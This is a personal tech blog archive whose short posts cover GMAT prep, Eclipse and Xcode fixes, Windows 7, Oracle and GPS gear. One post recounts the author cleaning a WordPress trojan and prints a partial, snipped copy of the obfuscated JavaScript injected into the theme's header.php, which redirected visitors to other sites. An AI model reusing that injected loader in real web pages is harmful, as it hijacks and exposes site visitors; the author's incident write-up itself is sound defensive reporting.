Michaelzanussi.com

It brings back many memories, all unpleasant. Yes, it does suck that bad.

I decided recently to consider returning to school on a part-time basis to earn my MBA. Beyond understanding the practical or metaphysical reasons of why I want to go to business school, something that hopefully I will cover brilliantly in my Statement of Purpose, one of the first items on the potential grad student’s checklist is to take the entrance exam. For those seeking an MBA, that would typically be the GMAT…

continue reading

I’m still not sure how it happened, but somehow my blog was infected with the JS/Wonka trojan at some point in the last few weeks.

I knew something was amiss when I tried to reach michaelzanussi.com from the office and was immediately redirected to the company’s “This Website has been Blocked” page. The vague reason given was for “malicious code”. Shocking to see that, to say the least.

Back at home, things looked okay for a few seconds until I noticed being redirected to some random sites (superpages.com, primosearch.com, blueseek.com, hellometro.com, etc., and a few dreaded IPs that who knows housed what nefarious things.) I encountered the same behavior with Chrome and Firefox, but not with Safari. When I tried in IE on my wife’s Window’s netbook, McAfee actually identified the trojan and removed it prior to rendering.

With that info in hand and a few minutes research, I found the problem in the WordPress theme file header.php. Someone/thing had inserted some malicious JavaScript. I won’t repeat the whole string here, it came in at 1989 bytes, but it was pretty obvious this was alien code that did not belong:

<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Doepx

…snip…

/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')</script>

It was a simple matter of deleting the offending code, and now, it appears, the problem is resolved.

2/25/2010 Update: As of last night, I’d been running WordPress 2.7.1 for quite some time and I’m starting to wonder if there is a way to exploit earlier WP versions that would allow anyone to create users with Admin privileges. After deleting a bunch of users last night, I noticed a new user setup as an Admin tonight. I’ve since upgraded to 2.9.2, we’ll see if it has any affect.

I also wrote a quick Java app to decode the obfuscated JavaScript that was injected, and it looks like the redirects have been routing through itsallbreaksoft.net and then redirecting elsewhere. It didn’t take long to find a lot of recent blog activity related to this exploit, and at this time doesn’t seem to make much sense to post a code analysis here, you can read a good summary at TechnoSocial.

Oracle Completes Acquisition of Sun.

How ’bout that iPad though? All hype, or not?

Making the rounds on the ‘net, geek film criticism at its finest, the 7-part 70 minute review of Star Wars Episode I: The Phantom Menace. Not to be missed, even by the non-geeks out there. Enjoy.

Part 1:

Part 2:

Part 3:

Part 4:

Part 5:

Part 6:

Part 7:

I can’t blame Windows on this one. I’d been noticing significant performance degradation of my office PC and it would appear to be a memory leak of some sort in Firefox 3.5.6:

Yikes, that’s not good. Might be an add-on or something. Guess I’ll have to try and narrow that down at some point, but quite honestly, I’m not in the mood to troubleshoot the problem. I’ll just restart Firefox:

Now it just GPFs after 5 minutes shutting the app down. Can’t be too surprised, I guess, a 1034K memory leak might lead to such things.

I’m not at all familiar with xul.dll, not sure if it’s the root cause or simply a side effect, but I guess it’s a good enough starting point. Off to Google after a reboot!

With World of Warcraft patch 3.3, you get an extra bonus with your expired AH items:

0:0:14340:360:0

I’ve been playing around with the iPhone SDK for a few months now. They’re cool devices and developing iPhone/iPod touch apps is a lot of fun.

But, I’m not so enamored with the platform that I’ll likely continue developing for it anymore. Apple tightly controls development on the devices, and that closed of a system is a big turn-off for me. From requiring $100 to join Apple Developer Connection so I can deploy to my own device to their App Store review and approval process, I’m just not sure it’s worth much more of my time, more so now that Android is running wild ( a serious iPhone threat, mark my words.)

For now, I’ll go back to Mac development.

Adding and using new content in My Yahoo! in the form of an RSS or Atom feed usually works great. Sometimes, though, things go haywire. A common example is the “Oops! There was a problem loading this content. Please check back later.” message where content would normally be. But that typically clears itself up with a page reload.

Recently, though, Yahoo! has been having a little problem with some of my content. With most content, you hover your mouse over the title bar where the content title is located and you’ll see the URL displayed in the status bar. For some bizarre reason, however, although the title on the problematic context says michaelzanussi.com, it’s actually pointing to jaysonknight.com:

It’s been like that for a week now. Odd, huh? So far, I haven’t found any references to this issue on the web, but that’s probably due to how I’m searching for it. Adding the RSS feed again resolves the problem, but it would be interesting to find out what’s going on here.

I recently upgraded Eclipse to the latest version Galileo (build 20090920-1017) and noticed immediately that values are no longer displayed when you hover your mouse over a variable while debugging. Hover in Debug perspective was behaving the same as in Java perspective:

I tried the usual stuff like cleaning the project or re-importing the project, verifying settings and preferences, but nothing had an effect. In fact, this problem was occurring in every project in my workspace.

What ultimately fixed this issue was something I would never have guessed unless I just stumbled upon it by accident. Which, of course, I did. The solution? Renaming the package (Refactor -> Rename...) Now, hover is working just fine, in all projects:

I’m still scratching my head as to why this solved my problem.

Edited to add: I posted this over at Stack Overflow and one of the suggestions was to go into Window -> Preferences -> Java -> Editor -> Hovers and select the Variable Values option and assign a modifier.

When I was first trying to resolve this issue, this was one of the options I looked at, but oddly enough, there was no Variable Values preference available, it was missing. Once my “fix” above was applied, it magically appeared:

What exactly did renaming the package do here, and why would it have such widespread consequences? Strange.

Problem: Serena’s Dimensions CM diff tool generates “There has been a problem launching the diff/merge tool…” errors:

Analysis: The problem actually lies with pvcsmerge.exe and the issue is easy to recreate outside Dimensions. On running pvcsmerge.exe, the following error is generated: This application has failed to start because the application configuration is incorrect. Reinstalling the application may fix the problem.

Solution: Install the updated Visual C++ 2005 SP1 Redistributable Package. For more information on this particular issue, take a look here and here.

It’s probably not a good sign to see this since upgrading to Karmic Koala:

That’s Microsoft playing damage control after one of their employees, Simon Aldous, commented:

What we’ve tried to do with Windows 7 – whether it’s traditional format or in a touch format – is create a Mac look and feel in terms of graphics.

Oops. Hope your C.V. is up-to-date, Simon.

A friendly reminder that a new year is coming up and if you haven’t learned a new language yet, now’s the time to do it.

It’s hard to tell from this recent FAQ from Oracle, the section on NetBeans is kinda vague and that question could be answered either way, but Oracle certainly is committed to keeping JDeveloper as the main tool for their Oracle Fusion Middleware. Ugh.

That’s too bad, since NetBeans blows JDeveloper out of the water. We used JDeveloper for a short time here at the office for developing apps against OracleAS, and we dumped it pretty quickly in favor of Eclipse, in part because it was horribly bloated, had a klunky and unintuitive interface, and didn’t always integrate well with their own products, namely OracleAS. It could be JDeveloper has evolved in the few years since I’ve used it, but they lost me at 10.1.3.

(Ok, I’m not a huge Oracle fan. Their millions upon millions of pages of documentation alone is enough to make one weep in absolute frustration.)

NetBeans is a great enterprise development tool (not to mention wonderful for Swing) and although I use Eclipse more, I think Oracle should rethink their main choice for development tools.

When you finally do buy Sun, Oracle, you best not kick NetBeans to the curb! (That goes doubly for MySQL!) Don’t make that mistake.

After years of buying junk, I’ve finally found a quality mount for my Garmin GPS.

It’s a locking suction mount from RAM Mount, model number RAM-B-166-GA12U. No more licking those suction cups! The locking mechanism creates an ultra-tight seal and holds up extremely well off-road. Made of heavy duty materials, it has a ball and socket on each end that makes adjusting the GPS location a snap. Don’t waste your money on cheap Radio Shack or Walmart mounts, I picked up mine at gpscity.com for only $30.

Highly recommended!

Ok, Microsoft is calling it Windows 7, but really, it’s just Vista SP3. Microsoft was smart to change the name to Windows 7 because quite honestly, Vista was an epic fail, and now it is their chance to redeem themselves.

I feel bad, though, for Vista users because they’ll have to pay for this upgrade. I’ll still run XP on my laptop, not quite ready to invest money in this latest release yet. I’ve even held off on upgrading to Snow Leopard, until Apple resolves some issues that are plaguing users and breaking some apps.

It doesn’t pay to be an early adopter these days.

The Guardian has a brilliant article on Microsoft’s user-led launch parties for Windows 7, coming to your neighborhood’s Windows fan’s home in late October. Here’s a link to the YouTube video in question, too amazing (or nauseating) to miss.

But, his take on Mac enthusiasts is funnier than hell and Mac fanboy that I am, I couldn’t help laughing:

I don’t like Apple products. And the better-designed and more ubiquitous they become, the more I dislike them. I blame the customers. Awful people. Awful. Stop showing me your iPhone. Stop stroking your Macbook. Stop telling me to get one.

Seriously, stop it. I don’t care if Mac stuff is better. I don’t care if Mac stuff is cool. I don’t care if every Mac product comes equipped a magic button on the side that causes it to piddle gold coins and resurrect the dead and make holographic unicorns dance inside your head. I’m not buying one, so shut up and go home. Go back to your house. I know, you’ve got an iHouse. The walls are brushed aluminum. There’s a glowing Apple logo on the roof. And you love it there. You absolute MONSTER.

The office PC has been replaced, but Eclipse isn’t happy anymore, complaining “JVM terminated. Exit code=2″ on startup:

The fix turned out easy enough, all in the environment:

1. Create JAVA_HOME.

2. Update PATH.

Now, if we can fix Hyperion…

Today was an important day, an enlightening day, for I now have more clarity and insight into the type of programmer I am, thanks to a great article by Joel Spolsky where he describes the duct tape programmer. A few highlights:

Duct tape programmers tend to avoid C++, templates, multiple inheritance, multithreading, COM, CORBA, and a host of other technologies that are all totally reasonable, when you think long and hard about them, but are, honestly, just a little bit too hard for the human brain.

and

You see, everybody else is too afraid of looking stupid because they just can’t keep enough facts in their head at once to make multiple inheritance, or templates, or COM, or multithreading, or any of that stuff work. So they sheepishly go along with whatever faddish programming craziness has come down from the architecture astronauts who speak at conferences and write books and articles and are so much smarter than us that they don’t realize that the stuff that they’re promoting is too hard for us.

Yep, that’s pretty much me (sans the pretty boy). I can’t tell you how many times I’ve felt I’m floundering about because I’m not up to speed with the latest development tools, software development methodologies, languages, or know every single design pattern out there. Or worry that I’m not engaging in enough object oriented programming, low-level *nix scripting, or writing multithreaded code.

It’s enough to drive one crazy.

But now that I know I’m not alone out there, maybe I can relax a bit knowing that I don’t need to be some kind of programming guru or know-it-all. I’m quite the capable programmer already.

It’s quite liberating.

Users with new PCs creating a database connection to Oracle in Hyperion Intelligence Designer 8.5 via Oracle Net are getting strange Oracle Error -1 messages:

Still haven’t figured it out, it’s a head scratcher.

Edited to add: We’re connecting to an Oracle database via Oracle Net connection software.

An article comparing the two new operating systems. The $29 upgrade to Snow Leopard is mighty, mighty tempting, but I’m holding back because 1) Parallels 4.0 might or might not be fully compatible with the latest Mac OS X and I need Windows to VPN into the office and 2) my Dell laptop running XP is degrading exponentially and it’s futile trying to VPN into the office.

I’m stuck.

I finally got fed up seeing __MyCompanyName__ in all my Xcode generated code:

However, there doesn’t seem to be an preference in Xcode for specifying the actual name of your company or whatever text you wish to use. So, you have to change it in a not-so-obvious way. There are two ways to accomplish this.

Option #1

Via terminal, specify

defaults write com.apple.Xcode PBXCustomTemplateMacroDefinitions '{"ORGANIZATIONNAME" = "michaelzanussi.com";}'

Option #2

Via the Property List Editor, in a less geeky manner I must admit, add the key-value pair to com.apple.Xcode.plist located in $HOME/Library/Preferences

Whichever option you choose, be sure to restart Xcode for the change to take effect.

Here’s what your newly generated code should now look like:

It’s not spectacular, but everyone must start somewhere.

Black Bear Pass (Colorado) — Warn winch advertisement, ca. 1975

It’s not really obvious how to do it on a Garmin GPSmap 60CSx, but below is a series of screen capures showing you the steps.

Here’s the Map screen. Looks kinda busy.

Press the Menu button and a menu will popup.

From the menu, select Setup Map and press the Enter button. You’ll now be presented with the following screen and a series of 6 tabs:

Cursor over to the Information tab (the one with the ‘i’ in a circle) and press the Menu button again, popping up a new menu.

Now you can Hide or Show whatever maps you want, individually or all at once. Here’s my (now boring) display with the Colorado topo map hidden: